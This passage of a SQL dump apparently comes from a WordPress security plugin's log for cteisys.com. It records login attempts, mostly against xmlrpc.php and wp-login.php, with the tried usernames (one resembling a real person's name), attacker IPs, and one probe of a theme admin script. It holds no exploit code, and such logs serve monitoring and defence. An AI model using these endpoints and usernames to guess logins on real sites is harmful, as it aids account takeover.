0),('139.180.135.86',2343864150,'newd',0,1664798162.3302,152,'UwjGMzXolt7OTIsCfaiyZrn6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('153.92.0.19',2572943379,'newd',0,1664798172.3791,152,'KXeqZiLw4Ax3JpMbzNI0Tvt6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.219.250.15',2732325391,'newd',0,1664798211.7285,152,'sKLgjuorODHR78NGXwmqxVMf','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.197.26',2916402458,'newd',0,1664798254.6189,152,'RTK1MY2AxjBOygW6EP0U8h9b','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.31.21.26',2065634586,'newd',0,1664799137.5772,152,'z1xSyDE23XGsZVwvimOKpkTM','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('178.128.104.173',2994759853,'newd',0,1664799579.9468,152,'OUn2L6zwQ1DVyKqR7W8mT05g','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('107.189.6.184',1807550136,'nathaniel-lipka',0,1664799811.1949,51,'5VJx2SdNWbIjzRCOLT6gFu0w','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('194.233.89.214',3270072790,'wadminw',0,1664800076.3866,152,'kCdiqm6evO3TNhM70uHRaEx9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.214.123.41',2731965225,'wadminw',0,1664800109.7526,152,'nfw1J2jsdWxVl9gOYSI47Mrm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('35.193.197.89',599901529,'wwwadmin',0,1664800532.5325,152,'bdaoghYmWMkUi5lfF0vrRuxP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'wwwadmin',0,1664800553.6535,152,'bHlBPyNiLXpf0tmkTFSI5s78','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('15.161.131.84',262243156,'newd',0,1664801550.7902,152,'sBj10OTYyc54hAVXnizSodMH','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664801550.8904,152,'CsUR1lMbXdS9IhaipGw0Kyfq','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('138.201.61.46',2328444206,'newd',0,1664801571.2285,152,'HUPEkjdYzrcXKARtTeixqL4M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('153.92.0.19',2572943379,'newd',0,1664801580.2988,152,'NyaKdOp1XkrUHQ8uW6gVSMeJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'newd',0,1664801580.8486,152,'3sw6Lj7gmDAVuz98anr21KqX','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('162.55.131.89',2721547097,'newd',0,1664801588.1599,152,'7TYWimvS8rad3FcQg0zMJebR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('217.21.74.40',3642051112,'newd',0,1664801594.8129,152,'4nK86pNX70WcAzswRB3TPYqU','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('153.92.0.19',2572943379,'newd',0,1664801601.5645,152,'EeRl06FW7dTGC4yjYz8xHApP','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'wadminw',0,1664801665.4229,51,'H3SFGwrmsIYb2Zn7yQRAJg1C','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.90.235.91',1734011739,'wadminw',0,1664801672.3268,51,'dIU4efH9PvzRwa8G6mVQrNup','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('107.180.103.185',1806985145,'admin',0,1664803954.7292,152,'lcN2IdFoUMmnR5SYbkPhE8Lz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('173.212.201.41',2916403497,'admin',0,1664803972.3159,152,'kf6307bUxmzuoLG4QZJO2iyp','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('103.92.27.198',1734089670,'admin',0,1664804444.8585,152,'K3xnXwBLlrV91yPJpugRCdAS','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('209.141.46.253',3515690749,'newd',0,1664804616.1520,7,'0FPYZaqMErwcICmvVixh7D91','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('103.27.238.234',1729883882,'newd',0,1664804968.6876,152,'w2vXyzSULqKBRk8l31NPgfQW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('81.68.87.46',1363433262,'newd',0,1664804968.6876,152,'azgmcUybOvSud2oVh58e4QJR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('139.196.152.3',2344916995,'newd',0,1664805484.9840,152,'OSoFzLBpGTRvcj70CQEYwX4i','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('80.77.135.125',1347258237,'newd',0,1664805484.9832,152,'dciDFQfGRIgoxAzNnrwLkmeu','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.205.10.44',1556941356,'newd',0,1664805969.1832,152,'u9YPoIEyVO64T7CsMpRFjJlz','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('89.233.5.168',1508443560,'newd',0,1664805969.2816,152,'2VNkO5vDph63aeBtqfYmoKCj','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.136.232.254',3246975230,'newd',0,1664805970.5080,152,'DpqgCfRtr1Kh6M49sen8iIuy','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('42.200.109.156',717778332,'newd',0,1664805985.0783,152,'HkdNfjyKwGqA0l8uLs5Qt7cb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664805993.9196,152,'rGqchHJlRdu6wkOvyeTBiY9M','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.68.11.239',860097519,'newd',0,1664805994.5603,152,'tCunMUWvNcodhV2DBg6slZjL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('149.129.181.108',2508305772,'newd',0,1664806022.9934,152,'eK4Elg6Oa0bJqUwkhM1YB7Lm','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('64.227.183.25',1088665369,'newd',0,1664806467.3593,7,'Dz1kfUoWwV9FPlvGCq4AmRJu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('171.244.0.91',2884894811,'newd',0,1664806485.9249,7,'gHlv35FSXwd7u4IDesGi20Yf','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('144.208.67.117',2429567861,'newd',0,1664806526.1374,152,'ZC56FNGUqSIbz2xVah0wfopW','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('159.65.149.229',2671875557,'newd',0,1664807076.1575,152,'eFW8OThl4dS9GI2Mu17Uxjb6','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('196.44.176.39',3291263015,'newd',0,1664807077.8328,152,'g2qHN8M6AO1BPUfoRblndvct','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('207.244.239.41',3488935721,'newd',0,1664807587.2888,152,'QPuLS2Vbn8pKT4t1U7rNHhYa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.113.180.18',3497112594,'newd',0,1664807636.5166,7,'xr9KHpV4DiCFsmywzg2lO8ZS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('187.32.211.193',3139490753,'newd',0,1664807673.0258,7,'aDH1GX5lKeZRP7mINwLxUvg2','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('128.199.109.135',2160553351,'newd',0,1664808099.4383,152,'t6xDusEvPSVCncagoAU807rZ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('184.168.125.241',3098050033,'newd',0,1664808105.7878,152,'PanhUeYmTSlE17Wj0p2w9H43','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.38.20.161',3257275553,'',0,1664808238.6017,55,'0RcQHmhI3lkq4teFvEdgMzUj','','19|0|0|0|cteisys.com/wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php',0,19,0),('167.86.99.163',2807456675,'admin',0,1664808302.3040,152,'9V5qLSofvEXiyNc7jzO4Bst8','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('212.227.9.224',3571648992,'admin',0,1664808306.3947,152,'4kQxpTS3PeF6GJraj0DVUlIs','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('142.93.168.95',2388502623,'test',0,1664808311.5884,152,'XrSvdUqD23PylN4fe6W1gjcF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('123.25.21.16',2065241360,'newd',0,1664808855.3661,7,'b4NjpfcUV0mAaxECIuwHT8zR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('198.98.60.32',3328326688,'nathaniel-lipka',0,1664809719.0093,51,'KIEVdP8yW56pHi2OwCczB4Ng','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.55.206',3515693006,'newd',0,1664809903.6643,7,'g6oGwYeChKAfHFdUtVJ8iQus','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1664809993.1755,7,'7lZjq4TxU3BLmed1CAsoHFJW','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('167.71.234.124',2806508156,'newd',0,1664810028.6767,7,'12ro7HDPEReBUx6Kvlj08LYV','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('85.91.237.106',1432087914,'newd',0,1664811208.5043,7,'w48HqzQbgD1aVPNRnYtZ7iMK','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.143.36',2680917796,'newd',0,1664811234.7291,7,'qfcKUQ9oz12aiRZCgv7bhjr6','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.140.0',2319748096,'newd',0,1664812412.7663,7,'uEZqsFrIKSPGgdW9nR2pMyYL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('138.68.84.97',2319733857,'newd',0,1664812432.5137,7,'3EdIqkanGVrwMxhQyWo1iB5A','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('188.165.198.224',3164980960,'newd',0,1664813625.5998,7,'gCSpchXeyF296uP7v3bWBTND','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('178.217.190.82',3000614482,'newd',0,1664813644.8325,7,'1rZRpPknBxKMg72HyDwY4mFS','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('46.17.172.162',772910242,'newd',0,1664814203.7936,152,'b54c1qGgIrBxXwQMT9eLYHPJ','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('194.27.156.245',3256589557,'newd',0,1664814204.1264,152,'l5skeZFduSz8fVmPEiqryLIa','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('23.224.36.205',400565453,'newd',0,1664814206.8773,152,'9vuhZEtbjNof7IdmVzcenr2H','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.246',3110826486,'newd',0,1664814207.7772,152,'9g3NfjObJtGIxnsUeQ8rzAPF','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('115.165.166.192',1940235968,'newd',0,1664814212.3415,152,'3zYWpIAuU0chGHtfTNXxZ9yr','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664814214.4098,152,'A2jBHlaNg57DLeQ3dOxIZwF1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('104.251.216.88',1761335384,'newd',0,1664814216.3064,152,'rjtXMdCEnJTvksYH4ReBP9QD','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('46.28.3.42',773587754,'newd',0,1664814220.2853,152,'jxbl40sKYRNTcdm5H7MXFian','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.107.113.222',3110826462,'newd',0,1664814221.7790,152,'muw0Yh8LloVDTRWqzjdgIx9S','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1664814823.4321,7,'d97m1Gjukh0MvNWXSI6K8y4L','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('72.167.34.14',1218912782,'newd',0,1664814841.7112,7,'Yd6GXi0ylEtp9Pz5Q7mWnAIo','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('147.135.255.8',2475163400,'newd',0,1664815988.9656,7,'macMDqySd5BbjfiKFOhrgXlE','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('202.29.236.140',3390958732,'newd',0,1664816006.5733,7,'lyfktSKVs92h7mr4pIquBXbT','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('192.71.144.12',3225915404,'newd',0,1664817144.6379,7,'f47bSCV1cQokjJKXwpv9rT36','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('148.72.214.245',2487801589,'newd',0,1664817162.3164,7,'AVU6RbT81YEPLhF9s7pqlBkm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.57.9',3515693321,'newd',0,1664817279.4743,7,'aVAe4HpTz6EFxucvk3M89bSy','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'newd',0,1664818127.2380,7,'oVCm8fxHNbRtP0gM5YvE93Li','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'admin',0,1664818128.4778,51,'uAGL9WiKmBT45ygC6vrNFDIJ','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'newd',0,1664818129.7308,7,'LD2NISKxQbsgmtworOVaniJR','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'admin',0,1664818130.9684,51,'eSVr6F0dMs2JqDHBwKQ3AUgj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'newd',0,1664818132.2254,7,'LS6CTBrfgp5uaEenvFk83bWj','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.132.237',2388493549,'',0,1664818132.2299,10,'LS6CTBrfgp5uaEenvFk83bWj','','701|0|0|0|cteisys.com/wp-login.php',0,701,0),('142.93.132.237',2388493549,'',0,1664818133.3275,50,'DlkzBCmOLSe6WPUncby415Y9','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818134.6558,50,'ZkcPbOjIdglL2v8FDt7GCaoe','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818136.0117,50,'f74Za9zQPBKqsHdVY1LDbhvN','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818137.3060,50,'WV3o7lC9feKSrn4NqmuL8c62','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818138.6932,50,'K1qJtIQVxYuaTyEOkgAijpSo','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818140.0003,50,'pgHkzu24Y5sUShPIRLEtj9Kr','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818141.6039,50,'zZG1E3gJP4oaAFhjykHdDvxu','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818143.0988,50,'ONg8XWmS6Pjb91KJFsoruGcn','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818144.4119,50,'rpGSxDF0R3dzw258ejMyKq1O','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818145.8086,50,'HPT1Np5yx3sE8YbGAOaBo64K','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818147.1684,50,'hUv8o4xzFujlAMBQaVS0giGD','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818147.1691,18,'hUv8o4xzFujlAMBQaVS0giGD','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818148.1743,50,'IzlkxVPKQX7qnJ4GOMjdCFSg','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818148.1746,18,'IzlkxVPKQX7qnJ4GOMjdCFSg','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818149.1676,50,'mS9BQ6DAjUGNhbef0IwTCcxZ','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818149.1681,18,'mS9BQ6DAjUGNhbef0IwTCcxZ','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818150.3056,50,'uTAX5LxK1UEqmpH6PRlz9OCZ','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818150.3066,18,'uTAX5LxK1UEqmpH6PRlz9OCZ','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818151.2850,50,'JX4DNQgHL3Itnc75RlrVEzTy','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818151.2858,18,'JX4DNQgHL3Itnc75RlrVEzTy','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818152.2667,50,'9SQrmoiUFn1W4ITHyDlhA85K','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818152.2674,18,'9SQrmoiUFn1W4ITHyDlhA85K','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818153.3162,50,'SN5C8ry7MVUAew63E2bqG9Po','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818153.3166,18,'SN5C8ry7MVUAew63E2bqG9Po','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818154.3445,50,'WSsKn6yVEUrMdQieoFpaRhg5','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818154.3452,18,'WSsKn6yVEUrMdQieoFpaRhg5','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818155.3089,50,'LHY7kf4ed8bZQy6rRGzOKF1h','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818155.3095,18,'LHY7kf4ed8bZQy6rRGzOKF1h','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818156.3041,50,'xEG5slpf9j0qrg6FV8SQvoDd','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818156.3045,18,'xEG5slpf9j0qrg6FV8SQvoDd','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818157.4059,50,'V4CryA0LROkDgi1S5uGpaQKj','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818157.4063,18,'V4CryA0LROkDgi1S5uGpaQKj','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818158.3529,50,'KQA8dxe9aljWw2uzfsq3MC06','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818158.3533,18,'KQA8dxe9aljWw2uzfsq3MC06','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818159.3698,50,'yhlBJKCxHP7V4FjkSW8r2c1w','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818159.3703,18,'yhlBJKCxHP7V4FjkSW8r2c1w','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818160.3916,50,'8DBtGWfwsCx5mrLe7a1oHJXS','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818160.3922,18,'8DBtGWfwsCx5mrLe7a1oHJXS','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818161.4328,50,'MI8YEgie3T7pOrcZ4uXDzNoq','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818161.4333,18,'MI8YEgie3T7pOrcZ4uXDzNoq','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818162.3704,50,'wgDSBsZTmNzY9Q5RrnXPkc2v','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818162.3708,18,'wgDSBsZTmNzY9Q5RrnXPkc2v','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818163.4278,50,'Mf3tUmh7GKSVcj2DTbF9EPOC','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818163.4284,18,'Mf3tUmh7GKSVcj2DTbF9EPOC','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818164.4187,50,'qvQEX6HgfeLsCipkWPFSuBTK','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818164.4192,18,'qvQEX6HgfeLsCipkWPFSuBTK','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818165.5228,50,'mkwlfxA7g0PMXtC1KQYrHn3c','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818165.5232,18,'mkwlfxA7g0PMXtC1KQYrHn3c','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818167.5958,50,'FCsJz45vLBRjHPucNIEp7lZT','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818167.5965,18,'FCsJz45vLBRjHPucNIEp7lZT','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818168.5939,50,'I3vwXs6KnT1YMeJV8jtDioCx','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818168.5943,18,'I3vwXs6KnT1YMeJV8jtDioCx','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818169.5729,50,'FatyCkQ79WKAcbeXsN63J4lu','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818169.5733,18,'FatyCkQ79WKAcbeXsN63J4lu','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818170.5468,50,'78rEUJVHCuPGo3dFqtMaApbv','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818170.5474,18,'78rEUJVHCuPGo3dFqtMaApbv','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818171.5368,50,'bzfNBplAEFVRH82Qdmk1oIWn','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818171.5389,18,'bzfNBplAEFVRH82Qdmk1oIWn','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818172.5367,50,'AjpmQSWw6Fy3zsKoO5XD4vnH','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818172.5372,18,'AjpmQSWw6Fy3zsKoO5XD4vnH','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818173.5631,50,'uiTWPOBmJhCDnbF581v6Gcsq','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818173.5637,18,'uiTWPOBmJhCDnbF581v6Gcsq','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('142.93.132.237',2388493549,'',0,1664818176.3023,50,'P8UA13vHXqGTKxVrN5oFebL7','','10|0|0|0|cteisys.com/wp-login.php',0,10,0),('142.93.132.237',2388493549,'',0,1664818176.3031,18,'P8UA13vHXqGTKxVrN5oFebL7','','13|0|0|0|cteisys.com/wp-login.php',0,13,0),('148.72.214.194',2487801538,'newd',0,1664818292.8071,7,'Cua5y9RT6gOMxvwLVstlDzWe','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('157.230.127.126',2649128830,'newd',0,1664818309.9315,7,'CgMwXYTjtFISr0s79HJ6hD2i','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('92.205.161.6',1556979974,'newd',0,1664818626.5925,152,'lBCsxG052m1hZFpMyUfHwuno','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('148.153.64.181',2493071541,'newd',0,1664818626.7914,152,'sP03JFQ8D6TBelcCuMN4OYdI','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('51.38.132.211',858162387,'newd',0,1664818627.0920,152,'D9Xnt5FMZPfO73QbaVNrpoBL','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('185.2.6.13',3103917581,'newd',0,1664818628.9708,152,'xJErFylAR4W5hjXIvd98agOi','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('74.208.59.232',1255160808,'newd',0,1664818631.1000,152,'8qu5E1WJSVUhmGTvLXrRDYdb','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('5.161.119.55',94467895,'newd',0,1664818638.1166,152,'ETO7ah8XgAuqJRMpjibzfd53','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.106.207.43',795529003,'newd',0,1664818643.2414,152,'KcYLujiWHN7hJdr8XaGS1TvA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('91.134.248.249',1535572217,'newd',0,1664818645.3294,152,'MeUzc4V1KvpiBGD2XxldT7P9','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('47.114.72.18',796018706,'newd',0,1664819411.5373,7,'fp0KayA4iHE6W2ubcLOoDMjv','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('185.2.4.33',3103917089,'newd',0,1664819441.9880,7,'YmZfVIjMLDiTGvpSFyl8z93t','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1664820592.2878,7,'1T9vmy3kWxdYGj6FVfQ4aUpq','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('91.134.248.249',1535572217,'newd',0,1664820904.7655,152,'6CjL4AQan5l1kxq93mK7gHEN','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('61.221.35.27',1037902619,'newd',0,1664820904.7745,152,'ISecElhKGaYVjoQyr2WCpMPB','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('54.37.121.239',908425711,'newd',0,1664820904.7943,152,'Pd8DG7Os9b5CpJLIhjaR0SN3','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('52.172.40.95',883697759,'newd',0,1664820911.3690,152,'z9SygatW16kV8oJqYUeOFiZA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.10.82',3496806994,'newd',0,1664820913.8229,152,'Zb7Dg3NpW0FC8dPSrUmfzKJA','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('193.136.232.254',3246975230,'newd',0,1664820914.2856,152,'tiLGK17lvmCRO3Z6VIqkxXso','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('128.199.152.152',2160564376,'newd',0,1664820918.8498,152,'gIcQU9YneMFOvkfPytzjSRo1','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('208.109.214.179',3496859315,'newd',0,1664820923.8653,152,'jlY7D0V2qkLJz1euEmOZTR89','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('92.53.96.165',1547002021,'newd',0,1664820925.3116,152,'FPDu8B5ihf3n0U9Y7V1W6GcR','','0|0|0|0|cteisys.com/xmlrpc.php',0,0,0),('67.205.62.27',1137524251,'newd',0,1664821673.0950,7,'ewFVYk9tT7ycu6xhHl35gJmG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('80.88.88.149',1347967125,'newd',0,1664821688.4292,7,'Dz3pMqBeEvgAkKVRT1HNX6yO','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.49.253',3515691517,'nathaniel-lipka',0,1664821982.6892,51,'rKpRVwji5yUXT17oPD6tsueG','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('159.203.120.246',2680912118,'newd',0,1664822659.1426,7,'dGL7JXARSY2lmfZy9pPiCjWF','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('143.244.177.220',2415178204,'newd',0,1664822685.1123,7,'LFQSrCpmy2b6nWAwtx1dlJeu','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('205.185.124.182',3451485366,'newd',0,1664822959.1234,7,'oQDWByj3P4gp1idlNb7FaULm','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('142.93.201.0',2388510976,'newd',0,1664823496.8722,7,'oB38eP1VKtZ2XTumls9rinfL','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('146.148.44.185',2459184313,'newd',0,1664823502.4627,7,'FrjsvJGDt3AqXRS9xHnKEC8b','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('209.141.48.210',3515691218,'newd',0,1664823879.6925,7,'E9srKdL8mVInzy1gH6laPCBA','','0|0|0|0|cteisys.com/wp-login.php',0,0,0),('2